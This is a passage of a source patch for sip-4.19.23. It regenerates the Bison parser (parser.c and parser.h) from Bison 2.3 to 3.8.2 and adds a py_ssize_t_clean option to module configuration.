(getOptFlag(&(yyvsp[(3) - (3)].optflags),"Out",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"Out",bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_OUT; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags), "ResultSize", bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags), "ResultSize", bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_RESULT_SIZE; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags), "NoCopy", bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags), "NoCopy", bool_flag) != NULL) + (yyval.memArg).argflags |= ARG_NO_COPY; + +- if (getOptFlag(&(yyvsp[(3) - (3)].optflags),"Constrained",bool_flag) != NULL) ++ if (getOptFlag(&(yyvsp[0].optflags),"Constrained",bool_flag) != NULL) + 
{ + (yyval.memArg).argflags |= ARG_CONSTRAINED; + +@@ -8005,499 +8033,518 @@ yyreduce: + } + } + +- applyTypeFlags(currentModule, &(yyval.memArg), &(yyvsp[(3) - (3)].optflags)); +- (yyval.memArg).typehint_value = getTypeHintValue(&(yyvsp[(3) - (3)].optflags)); ++ applyTypeFlags(currentModule, &(yyval.memArg), &(yyvsp[0].optflags)); ++ (yyval.memArg).typehint_value = getTypeHintValue(&(yyvsp[0].optflags)); + } ++#line 8040 "../parser.c" + break; + +- case 555: +-#line 4521 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 556: /* optref: %empty */ ++#line 4547 "parser.y" ++ { + (yyval.number) = 0; + } ++#line 8048 "../parser.c" + break; + +- case 556: +-#line 4524 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 557: /* optref: '&' */ ++#line 4550 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("References not allowed in a C module"); + + (yyval.number) = ARG_IS_REF; + } ++#line 8059 "../parser.c" + break; + +- case 557: +-#line 4532 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 558: /* deref: %empty */ ++#line 4558 "parser.y" ++ { + (yyval.memArg).nrderefs = 0; + } ++#line 8067 "../parser.c" + break; + +- case 558: +-#line 4535 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- add_new_deref(&(yyval.memArg), &(yyvsp[(1) - (3)].memArg), TRUE); ++ case 559: /* deref: deref '*' TK_CONST */ ++#line 4561 "parser.y" ++ { ++ add_new_deref(&(yyval.memArg), &(yyvsp[-2].memArg), TRUE); + } ++#line 8075 "../parser.c" + break; + +- case 559: +-#line 4538 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- add_new_deref(&(yyval.memArg), &(yyvsp[(1) - (2)].memArg), FALSE); ++ case 560: /* deref: deref '*' */ ++#line 4564 "parser.y" ++ { ++ add_new_deref(&(yyval.memArg), &(yyvsp[-1].memArg), FALSE); + } ++#line 8083 "../parser.c" + break; + +- case 560: +-#line 4543 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 561: /* basetype: scopedname */ ++#line 4569 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = defined_type; +- 
(yyval.memArg).u.snd = (yyvsp[(1) - (1)].scpvalp); ++ (yyval.memArg).u.snd = (yyvsp[0].scpvalp); + + /* Try and resolve typedefs as early as possible. */ + resolveAnyTypedef(currentSpec, &(yyval.memArg)); + } ++#line 8096 "../parser.c" + break; + +- case 561: +-#line 4551 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 562: /* basetype: scopedname '<' cpptypelist '>' */ ++#line 4577 "parser.y" ++ { + templateDef *td; + + td = sipMalloc(sizeof(templateDef)); +- td->fqname = (yyvsp[(1) - (4)].scpvalp); +- td->types = (yyvsp[(3) - (4)].signature); ++ td->fqname = (yyvsp[-3].scpvalp); ++ td->types = (yyvsp[-1].signature); + + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = template_type; + (yyval.memArg).u.td = td; + } ++#line 8112 "../parser.c" + break; + +- case 562: +-#line 4562 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 563: /* basetype: TK_STRUCT scopedname */ ++#line 4588 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + + /* In a C module all structures must be defined. 
*/ + if (currentSpec -> genc) + { + (yyval.memArg).atype = defined_type; +- (yyval.memArg).u.snd = (yyvsp[(2) - (2)].scpvalp); ++ (yyval.memArg).u.snd = (yyvsp[0].scpvalp); + } + else + { + (yyval.memArg).atype = struct_type; +- (yyval.memArg).u.sname = (yyvsp[(2) - (2)].scpvalp); ++ (yyval.memArg).u.sname = (yyvsp[0].scpvalp); + } + } ++#line 8132 "../parser.c" + break; + +- case 563: +-#line 4577 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 564: /* basetype: TK_UNSIGNED TK_SHORT */ ++#line 4603 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ushort_type; + } ++#line 8141 "../parser.c" + break; + +- case 564: +-#line 4581 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 565: /* basetype: TK_SHORT */ ++#line 4607 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = short_type; + } ++#line 8150 "../parser.c" + break; + +- case 565: +-#line 4585 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 566: /* basetype: TK_UNSIGNED */ ++#line 4611 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = uint_type; + } ++#line 8159 "../parser.c" + break; + +- case 566: +-#line 4589 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 567: /* basetype: TK_UNSIGNED TK_INT */ ++#line 4615 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = uint_type; + } ++#line 8168 "../parser.c" + break; + +- case 567: +-#line 4593 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 568: /* basetype: TK_INT */ ++#line 4619 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = int_type; + } ++#line 8177 "../parser.c" + break; + +- case 568: +-#line 4597 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 569: /* basetype: TK_LONG */ ++#line 4623 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = long_type; + } ++#line 8186 "../parser.c" + break; + +- case 569: +-#line 4601 
"sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 570: /* basetype: TK_UNSIGNED TK_LONG */ ++#line 4627 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ulong_type; + } ++#line 8195 "../parser.c" + break; + +- case 570: +-#line 4605 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 571: /* basetype: TK_LONG TK_LONG */ ++#line 4631 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = longlong_type; + } ++#line 8204 "../parser.c" + break; + +- case 571: +-#line 4609 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 572: /* basetype: TK_UNSIGNED TK_LONG TK_LONG */ ++#line 4635 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ulonglong_type; + } ++#line 8213 "../parser.c" + break; + +- case 572: +-#line 4613 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 573: /* basetype: TK_FLOAT */ ++#line 4639 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = float_type; + } ++#line 8222 "../parser.c" + break; + +- case 573: +-#line 4617 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 574: /* basetype: TK_DOUBLE */ ++#line 4643 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = double_type; + } ++#line 8231 "../parser.c" + break; + +- case 574: +-#line 4621 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 575: /* basetype: TK_BOOL */ ++#line 4647 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = bool_type; + } ++#line 8240 "../parser.c" + break; + +- case 575: +-#line 4625 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 576: /* basetype: TK_SIGNED TK_CHAR */ ++#line 4651 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = sstring_type; + } ++#line 8249 "../parser.c" + break; + +- case 576: +-#line 4629 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 577: /* basetype: TK_UNSIGNED TK_CHAR */ ++#line 4655 
"parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ustring_type; + } ++#line 8258 "../parser.c" + break; + +- case 577: +-#line 4633 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 578: /* basetype: TK_CHAR */ ++#line 4659 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = string_type; + } ++#line 8267 "../parser.c" + break; + +- case 578: +-#line 4637 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 579: /* basetype: TK_WCHAR_T */ ++#line 4663 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = wstring_type; + } ++#line 8276 "../parser.c" + break; + +- case 579: +-#line 4641 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 580: /* basetype: TK_VOID */ ++#line 4667 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = void_type; + } ++#line 8285 "../parser.c" + break; + +- case 580: +-#line 4645 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 581: /* basetype: TK_PYOBJECT */ ++#line 4671 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pyobject_type; + } ++#line 8294 "../parser.c" + break; + +- case 581: +-#line 4649 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 582: /* basetype: TK_PYTUPLE */ ++#line 4675 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pytuple_type; + } ++#line 8303 "../parser.c" + break; + +- case 582: +-#line 4653 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 583: /* basetype: TK_PYLIST */ ++#line 4679 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pylist_type; + } ++#line 8312 "../parser.c" + break; + +- case 583: +-#line 4657 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 584: /* basetype: TK_PYDICT */ ++#line 4683 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pydict_type; + } ++#line 8321 "../parser.c" + break; + +- 
case 584: +-#line 4661 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 585: /* basetype: TK_PYCALLABLE */ ++#line 4687 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pycallable_type; + } ++#line 8330 "../parser.c" + break; + +- case 585: +-#line 4665 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 586: /* basetype: TK_PYSLICE */ ++#line 4691 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pyslice_type; + } ++#line 8339 "../parser.c" + break; + +- case 586: +-#line 4669 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 587: /* basetype: TK_PYTYPE */ ++#line 4695 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pytype_type; + } ++#line 8348 "../parser.c" + break; + +- case 587: +-#line 4673 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 588: /* basetype: TK_PYBUFFER */ ++#line 4699 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = pybuffer_type; + } ++#line 8357 "../parser.c" + break; + +- case 588: +-#line 4677 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 589: /* basetype: TK_SIPSSIZET */ ++#line 4703 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ssize_type; + } ++#line 8366 "../parser.c" + break; + +- case 589: +-#line 4681 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 590: /* basetype: TK_SIZET */ ++#line 4707 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = size_type; + } ++#line 8375 "../parser.c" + break; + +- case 590: +-#line 4685 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 591: /* basetype: TK_ELLIPSIS */ ++#line 4711 "parser.y" ++ { + memset(&(yyval.memArg), 0, sizeof (argDef)); + (yyval.memArg).atype = ellipsis_type; + } ++#line 8384 "../parser.c" + break; + +- case 591: +-#line 4691 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 592: /* cpptypelist: cpptype */ ++#line 4717 "parser.y" ++ { 
+ /* The single or first type. */ + +- (yyval.signature).args[0] = (yyvsp[(1) - (1)].memArg); ++ (yyval.signature).args[0] = (yyvsp[0].memArg); + (yyval.signature).nrArgs = 1; + } ++#line 8395 "../parser.c" + break; + +- case 592: +-#line 4697 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 593: /* cpptypelist: cpptypelist ',' cpptype */ ++#line 4723 "parser.y" ++ { + /* Check there is nothing after an ellipsis. */ +- if ((yyvsp[(1) - (3)].signature).args[(yyvsp[(1) - (3)].signature).nrArgs - 1].atype == ellipsis_type) ++ if ((yyvsp[-2].signature).args[(yyvsp[-2].signature).nrArgs - 1].atype == ellipsis_type) + yyerror("An ellipsis must be at the end of the argument list"); + + /* Check there is room. */ +- if ((yyvsp[(1) - (3)].signature).nrArgs == MAX_NR_ARGS) ++ if ((yyvsp[-2].signature).nrArgs == MAX_NR_ARGS) + yyerror("Internal error - increase the value of MAX_NR_ARGS"); + +- (yyval.signature) = (yyvsp[(1) - (3)].signature); ++ (yyval.signature) = (yyvsp[-2].signature); + +- (yyval.signature).args[(yyval.signature).nrArgs] = (yyvsp[(3) - (3)].memArg); ++ (yyval.signature).args[(yyval.signature).nrArgs] = (yyvsp[0].memArg); + (yyval.signature).nrArgs++; + } ++#line 8414 "../parser.c" + break; + +- case 593: +-#line 4713 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 594: /* optexceptions: %empty */ ++#line 4739 "parser.y" ++ { + (yyval.throwlist) = NULL; + } ++#line 8422 "../parser.c" + break; + +- case 594: +-#line 4716 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 595: /* optexceptions: TK_THROW '(' exceptionlist ')' */ ++#line 4742 "parser.y" ++ { + if (currentSpec->genc) + yyerror("Exceptions not allowed in a C module"); + +- (yyval.throwlist) = (yyvsp[(3) - (4)].throwlist); ++ (yyval.throwlist) = (yyvsp[-1].throwlist); + } ++#line 8433 "../parser.c" + break; + +- case 595: +-#line 4724 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 596: /* exceptionlist: %empty */ ++#line 4750 "parser.y" ++ { + /* Empty list so use a blank. 
*/ + + (yyval.throwlist) = sipMalloc(sizeof (throwArgs)); + (yyval.throwlist) -> nrArgs = 0; + } ++#line 8444 "../parser.c" + break; + +- case 596: +-#line 4730 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 597: /* exceptionlist: scopedname */ ++#line 4756 "parser.y" ++ { + /* The only or first exception. */ + + (yyval.throwlist) = sipMalloc(sizeof (throwArgs)); + (yyval.throwlist) -> nrArgs = 1; +- (yyval.throwlist) -> args[0] = findException(currentSpec, (yyvsp[(1) - (1)].scpvalp), FALSE); ++ (yyval.throwlist) -> args[0] = findException(currentSpec, (yyvsp[0].scpvalp), FALSE); + } ++#line 8456 "../parser.c" + break; + +- case 597: +-#line 4737 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 598: /* exceptionlist: exceptionlist ',' scopedname */ ++#line 4763 "parser.y" ++ { + /* Check that it wasn't ...(,arg...). */ + +- if ((yyvsp[(1) - (3)].throwlist) -> nrArgs == 0) ++ if ((yyvsp[-2].throwlist) -> nrArgs == 0) + yyerror("First exception of throw specifier is missing"); + + /* Check there is room. */ + +- if ((yyvsp[(1) - (3)].throwlist) -> nrArgs == MAX_NR_ARGS) ++ if ((yyvsp[-2].throwlist) -> nrArgs == MAX_NR_ARGS) + yyerror("Internal error - increase the value of MAX_NR_ARGS"); + +- (yyval.throwlist) = (yyvsp[(1) - (3)].throwlist); +- (yyval.throwlist) -> args[(yyval.throwlist) -> nrArgs++] = findException(currentSpec, (yyvsp[(3) - (3)].scpvalp), FALSE); ++ (yyval.throwlist) = (yyvsp[-2].throwlist); ++ (yyval.throwlist) -> args[(yyval.throwlist) -> nrArgs++] = findException(currentSpec, (yyvsp[0].scpvalp), FALSE); + } ++#line 8475 "../parser.c" + break; + + +-/* Line 1267 of yacc.c. */ +-#line 8408 "sip-4.19.23/sipgen/parser.c" ++#line 8479 "../parser.c" ++ + default: break; + } +- YY_SYMBOL_PRINT ("-> $$ =", yyr1[yyn], &yyval, &yyloc); ++ /* User semantic actions sometimes alter yychar, and that requires ++ that yytoken be updated with the new translation. We take the ++ approach of translating immediately before every use of yytoken. 
++ One alternative is translating here after every semantic action, ++ but that translation would be missed if the semantic action invokes ++ YYABORT, YYACCEPT, or YYERROR immediately after altering yychar or ++ if it invokes YYBACKUP. In the case of YYABORT or YYACCEPT, an ++ incorrect destructor might then be invoked immediately. In the ++ case of YYERROR or YYBACKUP, subsequent parser actions might lead ++ to an incorrect destructor call or verbose syntax error message ++ before the lookahead is translated. */ ++ YY_SYMBOL_PRINT ("-> $$ =", YY_CAST (yysymbol_kind_t, yyr1[yyn]), &yyval, &yyloc); + + YYPOPSTACK (yylen); + yylen = 0; +- YY_STACK_PRINT (yyss, yyssp); + + *++yyvsp = yyval; + +- +- /* Now `shift' the result of the reduction. Determine what state ++ /* Now 'shift' the result of the reduction. Determine what state + that goes to, based on the state we popped back to and the rule + number reduced by. */ +- +- yyn = yyr1[yyn]; +- +- yystate = yypgoto[yyn - YYNTOKENS] + *yyssp; +- if (0 <= yystate && yystate <= YYLAST && yycheck[yystate] == *yyssp) +- yystate = yytable[yystate]; +- else +- yystate = yydefgoto[yyn - YYNTOKENS]; ++ { ++ const int yylhs = yyr1[yyn] - YYNTOKENS; ++ const int yyi = yypgoto[yylhs] + *yyssp; ++ yystate = (0 <= yyi && yyi <= YYLAST && yycheck[yyi] == *yyssp ++ ? yytable[yyi] ++ : yydefgoto[yylhs]); ++ } + + goto yynewstate; + + +-/*------------------------------------. +-| yyerrlab -- here on detecting error | +-`------------------------------------*/ ++/*--------------------------------------. ++| yyerrlab -- here on detecting error. | ++`--------------------------------------*/ + yyerrlab: ++ /* Make sure we have latest lookahead translation. See comments at ++ user semantic actions for why this is necessary. */ ++ yytoken = yychar == YYEMPTY ? YYSYMBOL_YYEMPTY : YYTRANSLATE (yychar); + /* If not already recovering from an error, report this error. */ + if (!yyerrstatus) + { + ++yynerrs; +-#if ! 
YYERROR_VERBOSE + yyerror (YY_("syntax error")); +-#else +- { +- YYSIZE_T yysize = yysyntax_error (0, yystate, yychar); +- if (yymsg_alloc < yysize && yymsg_alloc < YYSTACK_ALLOC_MAXIMUM) +- { +- YYSIZE_T yyalloc = 2 * yysize; +- if (! (yysize <= yyalloc && yyalloc <= YYSTACK_ALLOC_MAXIMUM)) +- yyalloc = YYSTACK_ALLOC_MAXIMUM; +- if (yymsg != yymsgbuf) +- YYSTACK_FREE (yymsg); +- yymsg = (char *) YYSTACK_ALLOC (yyalloc); +- if (yymsg) +- yymsg_alloc = yyalloc; +- else +- { +- yymsg = yymsgbuf; +- yymsg_alloc = sizeof yymsgbuf; +- } +- } +- +- if (0 < yysize && yysize <= yymsg_alloc) +- { +- (void) yysyntax_error (yymsg, yystate, yychar); +- yyerror (yymsg); +- } +- else +- { +- yyerror (YY_("syntax error")); +- if (yysize != 0) +- goto yyexhaustedlab; +- } +- } +-#endif + } + +- +- + if (yyerrstatus == 3) + { +- /* If just tried and failed to reuse look-ahead token after an +- error, discard it. */ ++ /* If just tried and failed to reuse lookahead token after an ++ error, discard it. */ + + if (yychar <= YYEOF) +- { +- /* Return failure if at end of input. */ +- if (yychar == YYEOF) +- YYABORT; +- } ++ { ++ /* Return failure if at end of input. */ ++ if (yychar == YYEOF) ++ YYABORT; ++ } + else +- { +- yydestruct ("Error: discarding", +- yytoken, &yylval); +- yychar = YYEMPTY; +- } ++ { ++ yydestruct ("Error: discarding", ++ yytoken, &yylval); ++ yychar = YYEMPTY; ++ } + } + +- /* Else will try to reuse look-ahead token after shifting the error ++ /* Else will try to reuse lookahead token after shifting the error + token. */ + goto yyerrlab1; + +@@ -8506,14 +8553,13 @@ yyerrlab: + | yyerrorlab -- error raised explicitly by YYERROR. | + `---------------------------------------------------*/ + yyerrorlab: ++ /* Pacify compilers when the user code never invokes YYERROR and the ++ label yyerrorlab therefore never appears in user code. 
*/ ++ if (0) ++ YYERROR; ++ ++yynerrs; + +- /* Pacify compilers like GCC when the user code never invokes +- YYERROR and the label yyerrorlab therefore never appears in user +- code. */ +- if (/*CONSTCOND*/ 0) +- goto yyerrorlab; +- +- /* Do not reclaim the symbols of the rule which action triggered ++ /* Do not reclaim the symbols of the rule whose action triggered + this YYERROR. */ + YYPOPSTACK (yylen); + yylen = 0; +@@ -8526,42 +8572,42 @@ yyerrorlab: + | yyerrlab1 -- common code for both syntax error and YYERROR. | + `-------------------------------------------------------------*/ + yyerrlab1: +- yyerrstatus = 3; /* Each real token shifted decrements this. */ ++ yyerrstatus = 3; /* Each real token shifted decrements this. */ + ++ /* Pop stack until we find a state that shifts the error token. */ + for (;;) + { + yyn = yypact[yystate]; +- if (yyn != YYPACT_NINF) +- { +- yyn += YYTERROR; +- if (0 <= yyn && yyn <= YYLAST && yycheck[yyn] == YYTERROR) +- { +- yyn = yytable[yyn]; +- if (0 < yyn) +- break; +- } +- } ++ if (!yypact_value_is_default (yyn)) ++ { ++ yyn += YYSYMBOL_YYerror; ++ if (0 <= yyn && yyn <= YYLAST && yycheck[yyn] == YYSYMBOL_YYerror) ++ { ++ yyn = yytable[yyn]; ++ if (0 < yyn) ++ break; ++ } ++ } + + /* Pop the current state because it cannot handle the error token. */ + if (yyssp == yyss) +- YYABORT; ++ YYABORT; + + + yydestruct ("Error: popping", +- yystos[yystate], yyvsp); ++ YY_ACCESSING_SYMBOL (yystate), yyvsp); + YYPOPSTACK (1); + yystate = *yyssp; + YY_STACK_PRINT (yyss, yyssp); + } + +- if (yyn == YYFINAL) +- YYACCEPT; +- ++ YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN + *++yyvsp = yylval; ++ YY_IGNORE_MAYBE_UNINITIALIZED_END + + + /* Shift the error token. 
*/ +- YY_SYMBOL_PRINT ("Shifting", yystos[yyn], yyvsp, yylsp); ++ YY_SYMBOL_PRINT ("Shifting", YY_ACCESSING_SYMBOL (yyn), yyvsp, yylsp); + + yystate = yyn; + goto yynewstate; +@@ -8572,53 +8618,57 @@ yyerrlab1: + `-------------------------------------*/ + yyacceptlab: + yyresult = 0; +- goto yyreturn; ++ goto yyreturnlab; ++ + + /*-----------------------------------. + | yyabortlab -- YYABORT comes here. | + `-----------------------------------*/ + yyabortlab: + yyresult = 1; +- goto yyreturn; ++ goto yyreturnlab; + +-#ifndef yyoverflow +-/*-------------------------------------------------. +-| yyexhaustedlab -- memory exhaustion comes here. | +-`-------------------------------------------------*/ ++ ++/*-----------------------------------------------------------. ++| yyexhaustedlab -- YYNOMEM (memory exhaustion) comes here. | ++`-----------------------------------------------------------*/ + yyexhaustedlab: + yyerror (YY_("memory exhausted")); + yyresult = 2; +- /* Fall through. */ +-#endif ++ goto yyreturnlab; ++ + +-yyreturn: +- if (yychar != YYEOF && yychar != YYEMPTY) +- yydestruct ("Cleanup: discarding lookahead", +- yytoken, &yylval); +- /* Do not reclaim the symbols of the rule which action triggered ++/*----------------------------------------------------------. ++| yyreturnlab -- parsing is finished, clean up and return. | ++`----------------------------------------------------------*/ ++yyreturnlab: ++ if (yychar != YYEMPTY) ++ { ++ /* Make sure we have latest lookahead translation. See comments at ++ user semantic actions for why this is necessary. */ ++ yytoken = YYTRANSLATE (yychar); ++ yydestruct ("Cleanup: discarding lookahead", ++ yytoken, &yylval); ++ } ++ /* Do not reclaim the symbols of the rule whose action triggered + this YYABORT or YYACCEPT. 
*/ + YYPOPSTACK (yylen); + YY_STACK_PRINT (yyss, yyssp); + while (yyssp != yyss) + { + yydestruct ("Cleanup: popping", +- yystos[*yyssp], yyvsp); ++ YY_ACCESSING_SYMBOL (+*yyssp), yyvsp); + YYPOPSTACK (1); + } + #ifndef yyoverflow + if (yyss != yyssa) + YYSTACK_FREE (yyss); + #endif +-#if YYERROR_VERBOSE +- if (yymsg != yymsgbuf) +- YYSTACK_FREE (yymsg); +-#endif +- /* Make sure YYID is used. */ +- return YYID (yyresult); +-} + ++ return yyresult; ++} + +-#line 4753 "sip-4.19.23/sipgen/metasrc/parser.y" ++#line 4779 "parser.y" + + + +@@ -13382,9 +13432,9 @@ static void addProperty(sipSpec *pt, mod + */ + static moduleDef *configureModule(sipSpec *pt, moduleDef *module, + const char *filename, const char *name, int c_module, KwArgs kwargs, +- int use_arg_names, int use_limited_api, int call_super_init, +- int all_raise_py_exc, const char *def_error_handler, +- docstringDef *docstring) ++ int use_arg_names, int py_ssize_t_clean, int use_limited_api, ++ int call_super_init, int all_raise_py_exc, ++ const char *def_error_handler, docstringDef *docstring) + { + moduleDef *mod; + +@@ -13418,6 +13468,9 @@ static moduleDef *configureModule(sipSpe + if (use_arg_names) + setUseArgNames(module); + ++ if (py_ssize_t_clean) ++ setPY_SSIZE_T_CLEAN(module); ++ + if (use_limited_api) + setUseLimitedAPI(module); + +@@ -13597,4 +13650,3 @@ static void checkEllipsis(signatureDef * + if (sd->args[a].atype == ellipsis_type && a < sd->nrArgs - 1) + yyerror("An ellipsis must be at the end of the argument list if /NoArgParser/ is not specified"); + } +- +Index: sip-4.19.23/sipgen/parser.h +=================================================================== +--- sip-4.19.23.orig/sipgen/parser.h ++++ sip-4.19.23/sipgen/parser.h +@@ -1,14 +1,14 @@ +-/* A Bison parser, made by GNU Bison 2.3. */ ++/* A Bison parser, made by GNU Bison 3.8.2. 
*/ + +-/* Skeleton interface for Bison's Yacc-like parsers in C ++/* Bison interface for Yacc-like parsers in C + +- Copyright (C) 1984, 1989, 1990, 2000, 2001, 2002, 2003, 2004, 2005, 2006 +- Free Software Foundation, Inc. ++ Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2021 Free Software Foundation, ++ Inc. + +- This program is free software; you can redistribute it and/or modify ++ This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by +- the Free Software Foundation; either version 2, or (at your option) +- any later version. ++ the Free Software Foundation, either version 3 of the License, or ++ (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of +@@ -16,9 +16,7 @@ + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License +- along with this program; if not, write to the Free Software +- Foundation, Inc., 51 Franklin Street, Fifth Floor, +- Boston, MA 02110-1301, USA. */ ++ along with this program. If not, see <https://www.gnu.org/licenses/>. */ + + /* As a special exception, you may create a larger work that contains + part or all of the Bison parser skeleton and distribute that work +@@ -33,164 +31,187 @@ + This special exception was added by the Free Software Foundation in + version 2.2 of Bison. */ + +-/* Tokens. */ ++/* DO NOT RELY ON FEATURES THAT ARE NOT DOCUMENTED in the manual, ++ especially those whose name start with YY_ or yy_. They are ++ private implementation details that can be changed or removed. */ ++ ++#ifndef YY_YY_PARSER_H_INCLUDED ++# define YY_YY_PARSER_H_INCLUDED ++/* Debug traces. */ ++#ifndef YYDEBUG ++# define YYDEBUG 0 ++#endif ++#if YYDEBUG ++extern int yydebug; ++#endif ++ ++/* Token kinds. 
*/ + #ifndef YYTOKENTYPE + # define YYTOKENTYPE +- /* Put the tokens into the symbol table, so that GDB and other debuggers +- know about them. */ +- enum yytokentype { +- TK_API = 258, +- TK_AUTOPYNAME = 259, +- TK_DEFDOCSTRFMT = 260, +- TK_DEFDOCSTRSIG = 261, +- TK_DEFENCODING = 262, +- TK_PLUGIN = 263, +- TK_VIRTERRORHANDLER = 264, +- TK_EXPTYPEHINTCODE = 265, +- TK_TYPEHINTCODE = 266, +- TK_DOCSTRING = 267, +- TK_DOC = 268, +- TK_EXPORTEDDOC = 269, +- TK_EXTRACT = 270, +- TK_MAKEFILE = 271, +- TK_ACCESSCODE = 272, +- TK_GETCODE = 273, +- TK_SETCODE = 274, +- TK_PREINITCODE = 275, +- TK_INITCODE = 276, +- TK_POSTINITCODE = 277, +- TK_FINALCODE = 278, +- TK_UNITCODE = 279, +- TK_UNITPOSTINCLUDECODE = 280, +- TK_MODCODE = 281, +- TK_TYPECODE = 282, +- TK_PREPYCODE = 283, +- TK_COPYING = 284, +- TK_MAPPEDTYPE = 285, +- TK_CODELINE = 286, +- TK_IF = 287, +- TK_END = 288, +- TK_NAME_VALUE = 289, +- TK_PATH_VALUE = 290, +- TK_STRING_VALUE = 291, +- TK_VIRTUALCATCHERCODE = 292, +- TK_TRAVERSECODE = 293, +- TK_CLEARCODE = 294, +- 